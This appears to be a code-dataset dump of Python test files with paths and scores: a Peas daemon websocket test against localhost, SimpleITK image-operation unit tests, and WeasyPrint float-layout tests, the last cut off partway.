max_msg_size=100 * 1024 * 1024,
)
service_name = "test_service_name"
data = {"service": service_name}
payload = create_payload("register_service", data, service_name, "daemon")
await ws.send_str(payload)
message_queue = asyncio.Queue()
async def reader(ws, queue):
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.TEXT:
message = msg.data.strip()
message = json.loads(message)
await queue.put(message)
elif msg.type == aiohttp.WSMsgType.PING:
await ws.pong()
elif msg.type == aiohttp.WSMsgType.PONG:
continue
else:
if msg.type == aiohttp.WSMsgType.CLOSE:
await ws.close()
elif msg.type == aiohttp.WSMsgType.ERROR:
await ws.close()
elif msg.type == aiohttp.WSMsgType.CLOSED:
pass
break
read_handler = asyncio.create_task(reader(ws, message_queue))
data = {}
payload = create_payload("get_blockchain_state", data, service_name, "peas_full_node")
await ws.send_str(payload)
await asyncio.sleep(5)
blockchain_state_found = False
while not message_queue.empty():
message = await message_queue.get()
if message["command"] == "get_blockchain_state":
blockchain_state_found = True
await ws.close()
read_handler.cancel()
assert blockchain_state_found | tests/core/daemon/test_daemon.py | from peas.server.outbound_message import NodeType
from peas.server.server import ssl_context_for_server
from peas.types.peer_info import PeerInfo
from tests.block_tools import create_block_tools
from peas.util.ints import uint16
from peas.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, self_hostname, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert, time_out_assert_custom_interval
from tests.util.keyring import TempKeyring
import asyncio
import atexit
import json
import aiohttp
import pytest
def cleanup_keyring(keyring: TempKeyring):
keyring.cleanup()
temp_keyring1 = TempKeyring()
temp_keyring2 = TempKeyring()
atexit.register(cleanup_keyring, temp_keyring1)
atexit.register(cleanup_keyring, temp_keyring2)
b_tools = create_block_tools(constants=test_constants_modified, keychain=temp_keyring1.get_keychain())
b_tools_1 = create_block_tools(constants=test_constants_modified, keychain=temp_keyring2.get_keychain())
new_config = b_tools._config
new_config["daemon_port"] = 55401
b_tools.change_config(new_config)
class TestDaemon:
@pytest.fixture(scope="function")
async def get_daemon(self):
async for _ in setup_daemon(btools=b_tools):
yield _
@pytest.fixture(scope="function")
async def simulation(self):
async for _ in setup_full_system(
b_tools_1.constants, b_tools=b_tools, b_tools_1=b_tools_1, connect_to_daemon=True
):
yield _
@pytest.mark.asyncio
async def test_daemon_simulation(self, simulation, get_daemon):
node1, node2, _, _, _, _, _, _, _, server1 = simulation
await server1.start_client(PeerInfo(self_hostname, uint16(21238)))
async def num_connections():
count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
return count
await time_out_assert_custom_interval(60, 1, num_connections, 1)
await time_out_assert(1500, node_height_at_least, True, node2, 1)
session = aiohttp.ClientSession()
crt_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_crt"]
key_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_key"]
ca_cert_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["crt"]
ca_key_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["key"]
ssl_context = ssl_context_for_server(ca_cert_path, ca_key_path, crt_path, key_path)
ws = await session.ws_connect(
"wss://127.0.0.1:55401",
autoclose=True,
autoping=True,
heartbeat=60,
ssl_context=ssl_context,
max_msg_size=100 * 1024 * 1024,
)
service_name = "test_service_name"
data = {"service": service_name}
payload = create_payload("register_service", data, service_name, "daemon")
await ws.send_str(payload)
message_queue = asyncio.Queue()
async def reader(ws, queue):
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.TEXT:
message = msg.data.strip()
message = json.loads(message)
await queue.put(message)
elif msg.type == aiohttp.WSMsgType.PING:
await ws.pong()
elif msg.type == aiohttp.WSMsgType.PONG:
continue
else:
if msg.type == aiohttp.WSMsgType.CLOSE:
await ws.close()
elif msg.type == aiohttp.WSMsgType.ERROR:
await ws.close()
elif msg.type == aiohttp.WSMsgType.CLOSED:
pass
break
read_handler = asyncio.create_task(reader(ws, message_queue))
data = {}
payload = create_payload("get_blockchain_state", data, service_name, "peas_full_node")
await ws.send_str(payload)
await asyncio.sleep(5)
blockchain_state_found = False
while not message_queue.empty():
message = await message_queue.get()
if message["command"] == "get_blockchain_state":
blockchain_state_found = True
await ws.close()
read_handler.cancel()
assert blockchain_state_found | 0.366476 | 0.349699 |
import unittest
import numpy as np
import SimpleITK as sitk
from deliravision.utils.image_ops import bounding_box, \
calculate_origin_offset, max_energy_slice, \
sitk_copy_metadata, sitk_new_blank_image, \
sitk_resample_to_image, sitk_resample_to_shape, sitk_resample_to_spacing
class ImageOpTest(unittest.TestCase):
def setUp(self) -> None:
self._img = np.zeros((45, 45, 45))
self._img[23:25, 5:40, 10:35] = 1
# convert array to nested list
self._img = self._img.tolist()
def test_bounding_box(self):
bbox_list = bounding_box(self._img)
self.assertTupleEqual(bbox_list, (23, 24, 5, 39, 10, 34))
img_npy = np.array(self._img)
bbox_npy = bounding_box(img_npy)
self.assertTupleEqual(bbox_npy, (23, 24, 5, 39, 10, 34))
img_sitk = sitk.GetImageFromArray(img_npy)
bbox_sitk = bounding_box(img_sitk)
self.assertTupleEqual(bbox_sitk, (23, 24, 5, 39, 10, 34))
def test_calculate_origin_offset(self):
offset = calculate_origin_offset((3., 1., 1.), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [1., 0., 0.]):
self.assertAlmostEqual(_offset, _target_offset)
offset = calculate_origin_offset((1.5, 1.4, 1.3), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [0.25, 0.2, 0.15]):
self.assertAlmostEqual(_offset, _target_offset)
def test_max_energy_slice(self):
slice_idx = max_energy_slice(
sitk.GetImageFromArray(
np.array(
self._img)))
self.assertIn(slice_idx, [23, 24])
def test_copy_metadata(self):
img_sitk = sitk.GetImageFromArray(np.array(self._img))
img_sitk.SetMetaData("Foo", "Bar")
blank_image = sitk.GetImageFromArray(np.zeros((10, 10, 10)))
blank_image = sitk_copy_metadata(img_sitk, blank_image)
for key in blank_image.GetMetaDataKeys():
self.assertEqual(img_sitk.GetMetaData(key),
blank_image.GetMetaData(key))
def test_new_blank_image(self):
shape = (15, 13, 12)
spacing = (1., 2., 3.)
direction = (1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0, 1.0)
origin = (0., 0., 0.)
img = sitk_new_blank_image(shape, spacing, direction, origin)
self.assertTupleEqual(img.GetSize(), shape)
self.assertTupleEqual(img.GetSpacing(), spacing)
self.assertTupleEqual(img.GetDirection(), direction)
self.assertTupleEqual(img.GetOrigin(), origin)
def test_resample_to_image(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_image(
src_img, sitk.GetImageFromArray(np.array(self._img)))
self.assertTupleEqual(
resampled_img.GetSize(), np.array(
self._img).shape)
self.assertTupleEqual(resampled_img.GetSpacing(), (1., 1., 1.))
def test_resample_to_shape(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_shape(
src_img, np.array(self._img).shape)
self.assertTupleEqual(resampled_img.GetSize(),
np.array(self._img).shape)
def test_resample_to_spacing(self):
src_img = sitk.GetImageFromArray(np.array(self._img))
resampled_img = sitk_resample_to_spacing(src_img, (2., 3., 4.))
self.assertTupleEqual(resampled_img.GetSpacing(), (2., 3., 4.))
if __name__ == "__main__":
unittest.main() | tests/utils/image_ops.py | import unittest
import numpy as np
import SimpleITK as sitk
from deliravision.utils.image_ops import bounding_box, \
calculate_origin_offset, max_energy_slice, \
sitk_copy_metadata, sitk_new_blank_image, \
sitk_resample_to_image, sitk_resample_to_shape, sitk_resample_to_spacing
class ImageOpTest(unittest.TestCase):
def setUp(self) -> None:
self._img = np.zeros((45, 45, 45))
self._img[23:25, 5:40, 10:35] = 1
# convert array to nested list
self._img = self._img.tolist()
def test_bounding_box(self):
bbox_list = bounding_box(self._img)
self.assertTupleEqual(bbox_list, (23, 24, 5, 39, 10, 34))
img_npy = np.array(self._img)
bbox_npy = bounding_box(img_npy)
self.assertTupleEqual(bbox_npy, (23, 24, 5, 39, 10, 34))
img_sitk = sitk.GetImageFromArray(img_npy)
bbox_sitk = bounding_box(img_sitk)
self.assertTupleEqual(bbox_sitk, (23, 24, 5, 39, 10, 34))
def test_calculate_origin_offset(self):
offset = calculate_origin_offset((3., 1., 1.), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [1., 0., 0.]):
self.assertAlmostEqual(_offset, _target_offset)
offset = calculate_origin_offset((1.5, 1.4, 1.3), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [0.25, 0.2, 0.15]):
self.assertAlmostEqual(_offset, _target_offset)
def test_max_energy_slice(self):
slice_idx = max_energy_slice(
sitk.GetImageFromArray(
np.array(
self._img)))
self.assertIn(slice_idx, [23, 24])
def test_copy_metadata(self):
img_sitk = sitk.GetImageFromArray(np.array(self._img))
img_sitk.SetMetaData("Foo", "Bar")
blank_image = sitk.GetImageFromArray(np.zeros((10, 10, 10)))
blank_image = sitk_copy_metadata(img_sitk, blank_image)
for key in blank_image.GetMetaDataKeys():
self.assertEqual(img_sitk.GetMetaData(key),
blank_image.GetMetaData(key))
def test_new_blank_image(self):
shape = (15, 13, 12)
spacing = (1., 2., 3.)
direction = (1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0, 1.0)
origin = (0., 0., 0.)
img = sitk_new_blank_image(shape, spacing, direction, origin)
self.assertTupleEqual(img.GetSize(), shape)
self.assertTupleEqual(img.GetSpacing(), spacing)
self.assertTupleEqual(img.GetDirection(), direction)
self.assertTupleEqual(img.GetOrigin(), origin)
def test_resample_to_image(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_image(
src_img, sitk.GetImageFromArray(np.array(self._img)))
self.assertTupleEqual(
resampled_img.GetSize(), np.array(
self._img).shape)
self.assertTupleEqual(resampled_img.GetSpacing(), (1., 1., 1.))
def test_resample_to_shape(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_shape(
src_img, np.array(self._img).shape)
self.assertTupleEqual(resampled_img.GetSize(),
np.array(self._img).shape)
def test_resample_to_spacing(self):
src_img = sitk.GetImageFromArray(np.array(self._img))
resampled_img = sitk_resample_to_spacing(src_img, (2., 3., 4.))
self.assertTupleEqual(resampled_img.GetSpacing(), (2., 3., 4.))
if __name__ == "__main__":
unittest.main() | 0.665193 | 0.717829 |
import pytest
from weasyprint.formatting_structure import boxes
from .testing_utils import assert_no_logs, render_pages
def outer_area(box):
"""Return the (x, y, w, h) rectangle for the outer area of a box."""
return (box.position_x, box.position_y,
box.margin_width(), box.margin_height())
@assert_no_logs
def test_floats_1():
# adjacent-floats-001
page, = render_pages('''
<style>
div { float: left }
img { width: 100px; vertical-align: top }
</style>
<div><img src=pattern.png /></div>
<div><img src=pattern.png /></div>''')
html, = page.children
body, = html.children
div_1, div_2 = body.children
assert outer_area(div_1) == (0, 0, 100, 100)
assert outer_area(div_2) == (100, 0, 100, 100)
@assert_no_logs
def test_floats_2():
# c414-flt-fit-000
page, = render_pages('''
<style>
body { width: 290px }
div { float: left; width: 100px; }
img { width: 60px; vertical-align: top }
</style>
<div><img src=pattern.png /><!-- 1 --></div>
<div><img src=pattern.png /><!-- 2 --></div>
<div><img src=pattern.png /><!-- 4 --></div>
<img src=pattern.png /><!-- 3
--><img src=pattern.png /><!-- 5 -->''')
html, = page.children
body, = html.children
div_1, div_2, div_4, anon_block = body.children
line_3, line_5 = anon_block.children
img_3, = line_3.children
img_5, = line_5.children
assert outer_area(div_1) == (0, 0, 100, 60)
assert outer_area(div_2) == (100, 0, 100, 60)
assert outer_area(img_3) == (200, 0, 60, 60)
assert outer_area(div_4) == (0, 60, 100, 60)
assert outer_area(img_5) == (100, 60, 60, 60)
@assert_no_logs
def test_floats_3():
# c414-flt-fit-002
page, = render_pages('''
<style type="text/css">
body { width: 200px }
p { width: 70px; height: 20px }
.left { float: left }
.right { float: right }
</style>
<p class="left"> ⇦ A 1 </p>
<p class="left"> ⇦ B 2 </p>
<p class="left"> ⇦ A 3 </p>
<p class="right"> B 4 ⇨ </p>
<p class="left"> ⇦ A 5 </p>
<p class="right"> B 6 ⇨ </p>
<p class="right"> B 8 ⇨ </p>
<p class="left"> ⇦ A 7 </p>
<p class="left"> ⇦ A 9 </p>
<p class="left"> ⇦ B 10 </p>
''')
html, = page.children
body, = html.children
positions = [(paragraph.position_x, paragraph.position_y)
for paragraph in body.children]
assert positions == [
(0, 0), (70, 0), (0, 20), (130, 20), (0, 40), (130, 40),
(130, 60), (0, 60), (0, 80), (70, 80), ]
@assert_no_logs
def test_floats_4():
# c414-flt-wrap-000 ... more or less
page, = render_pages('''
<style>
body { width: 100px }
p { float: left; height: 100px }
img { width: 60px; vertical-align: top }
</style>
<p style="width: 20px"></p>
<p style="width: 100%"></p>
<img src=pattern.png /><img src=pattern.png />
''')
html, = page.children
body, = html.children
p_1, p_2, anon_block = body.children
line_1, line_2 = anon_block.children
assert anon_block.position_y == 0
assert (line_1.position_x, line_1.position_y) == (20, 0)
assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_5():
# c414-flt-wrap-000 with text ... more or less
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body { width: 100px; font: 60px weasyprint; }
p { float: left; height: 100px }
img { width: 60px; vertical-align: top }
</style>
<p style="width: 20px"></p>
<p style="width: 100%"></p>
A B
''')
html, = page.children
body, = html.children
p_1, p_2, anon_block = body.children
line_1, line_2 = anon_block.children
assert anon_block.position_y == 0
assert (line_1.position_x, line_1.position_y) == (20, 0)
assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_6():
# floats-placement-vertical-001b
page, = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<span>
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="float: left; width: 30px" />
</span>
''')
html, = page.children
body, = html.children
line_1, line_2 = body.children
span_1, = line_1.children
span_2, = line_2.children
img_1, = span_1.children
img_2, img_3 = span_2.children
assert outer_area(img_1) == (0, 0, 50, 50)
assert outer_area(img_2) == (30, 50, 50, 50)
assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_7():
# Variant of the above: no <span>
page, = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="float: left; width: 30px" />
''')
html, = page.children
body, = html.children
line_1, line_2 = body.children
img_1, = line_1.children
img_2, img_3 = line_2.children
assert outer_area(img_1) == (0, 0, 50, 50)
assert outer_area(img_2) == (30, 50, 50, 50)
assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_8():
# Floats do no affect other pages
page_1, page_2 = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<img src=pattern.png style="float: left; width: 30px" />
<img src=pattern.png style="width: 50px" />
<div style="page-break-before: always"></div>
<img src=pattern.png style="width: 50px" />
''')
html, = page_1.children
body, = html.children
float_img, anon_block, = body.children
line, = anon_block.children
img_1, = line.children
assert outer_area(float_img) == (0, 0, 30, 30)
assert outer_area(img_1) == (30, 0, 50, 50)
html, = page_2.children
body, = html.children
div, anon_block = body.children
line, = anon_block.children
img_2, = line.children
@assert_no_logs
def test_floats_9():
# Regression test
# https://github.com/Kozea/WeasyPrint/issues/263
page, = render_pages('''<div style="top:100%; float:left">''')
@assert_no_logs
def test_floats_page_breaks_1():
# Tests floated images shorter than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 45px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 2
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_2():
# Tests floated images taller than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 81px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 2
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_3():
# Tests floated images shorter than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 30px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 3
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10, 40], [10, 40], [10]]
@assert_no_logs
def test_floats_page_breaks_4():
# last float does not fit, pushed to next page
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 60px;
}
.small {
width: 10px;
height: 20px;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 2
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10, 70], [10]]
@assert_no_logs
def test_floats_page_breaks_5():
# last float does not fit, pushed to next page
# center div must not
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 60px;
}
.small {
width: 10px;
height: 20px;
page-break-after: avoid;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 2
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10], [10, 30]]
@assert_no_logs
def test_floats_page_breaks_6():
# center div must be the last element,
# but float won't fit and will get pushed anyway
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 80px;
}
.small {
width: 10px;
height: 20px;
page-break-after: avoid;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 3
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10], [10], [10]]
@assert_no_logs
def test_preferred_widths_1():
def get_float_width(body_width):
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
</style>
<body style="width: %spx; font-family: weasyprint">
<p style="white-space: pre-line; float: left">
Lorem ipsum dolor sit amet,
consectetur elit
</p>
<!-- ^ No-break space here -->
''' % body_width)
html, = page.children
body, = html.children
paragraph, = body.children
return paragraph.width
# Preferred minimum width:
assert get_float_width(10) == len('consectetur elit') * 16
# Preferred width:
assert get_float_width(1000000) == len('Lorem ipsum dolor sit amet,') * 16
@assert_no_logs
def test_preferred_widths_2():
# Non-regression test:
# Incorrect whitespace handling in preferred width used to cause
# unnecessary line break.
page, = render_pages('''
<p style="float: left">Lorem <em>ipsum</em> dolor.</p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
assert len(paragraph.children) == 1
assert isinstance(paragraph.children[0], boxes.LineBox)
@assert_no_logs
def test_preferred_widths_3():
page, = render_pages('''
<style>img { width: 20px }</style>
<p style="float: left">
<img src=pattern.png><img src=pattern.png><br>
<img src=pattern.png></p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_preferred_widths_4():
page, = render_pages(
'<style>'
' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
' p { font: 20px weasyprint }'
'</style>'
'<p style="float: left">XX<br>XX<br>X</p>')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_preferred_widths_5():
# The space is the start of the line is collapsed.
page, = render_pages(
'<style>'
' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
' p { font: 20px weasyprint }'
'</style>'
'<p style="float: left">XX<br> XX<br>X</p>')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_float_in_inline_1():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
width: 14em;
text-align: justify;
}
span {
float: right;
}
</style>
<p>
aa bb <a><span>cc</span> ddd</a> ee ff
</p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2 = paragraph.children
p1, a, p2 = line1.children
assert p1.width == 6 * 20
assert p1.text == 'aa bb '
assert p1.position_x == 0 * 20
assert p2.width == 3 * 20
assert p2.text == ' ee'
assert p2.position_x == 9 * 20
span, a_text = a.children
assert a_text.width == 3 * 20 # leading space collapse
assert a_text.text == 'ddd'
assert a_text.position_x == 6 * 20
assert span.width == 2 * 20
assert span.children[0].children[0].text == 'cc'
assert span.position_x == 12 * 20
p3, = line2.children
assert p3.width == 2 * 20
@assert_no_logs
def test_float_in_inline_2():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
<div>a b c</div>
1 2 3 4 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, = line1.children
div, text = span1.children
assert div.children[0].children[0].text.strip() == 'a b c'
assert text.text.strip() == '1 2 3'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_3():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
1 2 3 <div>a b c</div> 4 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, = line1.children
text, div = span1.children
assert text.text.strip() == '1 2 3'
assert div.children[0].children[0].text.strip() == 'a b c'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_4():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
1 2 3 4 <div>a b c</div> 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, div = line1.children
text1, text2 = span1.children
assert text1.text.strip() == '1 2 3 4'
assert text2.text.strip() == '5'
assert div.position_y == 16
assert div.children[0].children[0].text.strip() == 'a b c'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '6'
@assert_no_logs
def test_float_next_line():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 13em;
}
span {
float: left;
}
</style>
<p>pp pp pp pp <a><span>ppppp</span> aa</a> pp pp pp pp pp</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children
assert len(line1.children) == 1
assert len(line3.children) == 1
a, p = line2.children
span, a_text = a.children
assert span.position_x == 0
assert span.width == 5 * 20
assert a_text.position_x == a.position_x == 5 * 20
assert a_text.width == a.width == 2 * 20
assert p.position_x == 7 * 20
@assert_no_logs
def test_float_text_indent_1():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: left;
}
</style>
<p><a>aa <span>float</span> aa</a></p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, = paragraph.children
a, = line1.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == 0
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.width == 3 * 20
assert a1.position_x == (1 + 5 + 1) * 20 # span + a1 text-indent
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (1 + 5 + 1 + 3) * 20 # span + a1 t-i + a1
@assert_no_logs
def test_float_text_indent_2():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: left;
}
</style>
<p>
oooooooooooo
<a>aa <span>float</span> aa</a></p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2 = paragraph.children
p1, = line1.children
assert p1.position_x == 1 * 20 # text-indent
assert p1.width == 12 * 20 # p text
a, = line2.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == 0
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.width == 3 * 20
assert a1.position_x == (1 + 5) * 20 # span
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (1 + 5 + 3) * 20 # span + a1
@assert_no_logs
def test_float_text_indent_3():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: right;
}
</style>
<p>
oooooooooooo
<a>aa <span>float</span> aa</a>
oooooooooooo
</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children
p1, = line1.children
assert p1.position_x == 1 * 20 # text-indent
assert p1.width == 12 * 20 # p text
a, = line2.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == (14 - 5 - 1) * 20
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.position_x == 0 # span
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (14 - 5 - 1 - 2) * 20
p2, = line3.children
assert p2.position_x == 0
assert p2.width == 12 * 20 # p text
@pytest.mark.xfail
@assert_no_logs
def test_float_fail():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 12em;
}
span {
float: left;
background: red;
}
a {
background: yellow;
}
</style>
<p>bb bb pp bb pp pb <a><span>pp pp</span> apa</a> bb bb</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children | tests/test_float.py | import pytest
from weasyprint.formatting_structure import boxes
from .testing_utils import assert_no_logs, render_pages
def outer_area(box):
"""Return the (x, y, w, h) rectangle for the outer area of a box."""
return (box.position_x, box.position_y,
box.margin_width(), box.margin_height())
@assert_no_logs
def test_floats_1():
# adjacent-floats-001
page, = render_pages('''
<style>
div { float: left }
img { width: 100px; vertical-align: top }
</style>
<div><img src=pattern.png /></div>
<div><img src=pattern.png /></div>''')
html, = page.children
body, = html.children
div_1, div_2 = body.children
assert outer_area(div_1) == (0, 0, 100, 100)
assert outer_area(div_2) == (100, 0, 100, 100)
@assert_no_logs
def test_floats_2():
# c414-flt-fit-000
page, = render_pages('''
<style>
body { width: 290px }
div { float: left; width: 100px; }
img { width: 60px; vertical-align: top }
</style>
<div><img src=pattern.png /><!-- 1 --></div>
<div><img src=pattern.png /><!-- 2 --></div>
<div><img src=pattern.png /><!-- 4 --></div>
<img src=pattern.png /><!-- 3
--><img src=pattern.png /><!-- 5 -->''')
html, = page.children
body, = html.children
div_1, div_2, div_4, anon_block = body.children
line_3, line_5 = anon_block.children
img_3, = line_3.children
img_5, = line_5.children
assert outer_area(div_1) == (0, 0, 100, 60)
assert outer_area(div_2) == (100, 0, 100, 60)
assert outer_area(img_3) == (200, 0, 60, 60)
assert outer_area(div_4) == (0, 60, 100, 60)
assert outer_area(img_5) == (100, 60, 60, 60)
@assert_no_logs
def test_floats_3():
# c414-flt-fit-002
page, = render_pages('''
<style type="text/css">
body { width: 200px }
p { width: 70px; height: 20px }
.left { float: left }
.right { float: right }
</style>
<p class="left"> ⇦ A 1 </p>
<p class="left"> ⇦ B 2 </p>
<p class="left"> ⇦ A 3 </p>
<p class="right"> B 4 ⇨ </p>
<p class="left"> ⇦ A 5 </p>
<p class="right"> B 6 ⇨ </p>
<p class="right"> B 8 ⇨ </p>
<p class="left"> ⇦ A 7 </p>
<p class="left"> ⇦ A 9 </p>
<p class="left"> ⇦ B 10 </p>
''')
html, = page.children
body, = html.children
positions = [(paragraph.position_x, paragraph.position_y)
for paragraph in body.children]
assert positions == [
(0, 0), (70, 0), (0, 20), (130, 20), (0, 40), (130, 40),
